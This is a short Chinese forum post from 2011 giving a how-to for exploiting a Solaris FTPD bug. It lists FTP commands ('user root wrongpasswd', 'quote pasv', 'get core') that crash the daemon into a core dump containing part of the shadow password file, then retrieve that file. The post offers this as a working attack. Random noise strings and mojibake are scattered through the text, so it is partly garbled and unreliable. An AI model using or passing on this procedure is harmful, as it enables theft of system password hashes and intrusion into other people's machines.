該方法利用了Solaris 操作系統(tǒng)中FTPD的一個BUG�,使得用戶可以獲得該機的口令文件。具體過程如下:
- H/ a& H3 {4 B5 H7 h" u" e+ }! o. q( Z. d: L8 b4 N2 z! Q" R, c
1.通過 ftp 正常登錄到目的主機上
* u2 E( ^9 e0 F- H7 |' I- a$ ^& _9 [, \3 e6 x
2.輸入如下命令序列:
. b; A1 g' Q" N' Q( h+ @" \6 |# s0 x' d F# x1 u; c) a! v
ftp> user root wrongpasswd+ ^; ~/ ?' `, N: x$ ^
- n) ~4 i1 {( A" y9 ?3 J4 Lftp> quote pasv
$ T, M. l. j$ v! }
3 R$ m+ l I" z6 n$ U3.這時�,ftpd會報錯退出,同時會在當前目錄下生成一個core����,口令文件就包含在這個core中�����。2 Y' E5 H& \5 U! Q( O6 u8 F5 L/ C
' O+ } u2 ~% j% D& h8 j) o" ^4.再次進入FTP >get core% z* [' o! ]1 N5 k' [
0 s2 w! k9 h$ f
補充:雖然在core只有一部分shadow��,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了
9 r2 {% G9 M1 D: h( N# J4 o; D
) _3 V: U! \; T |
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡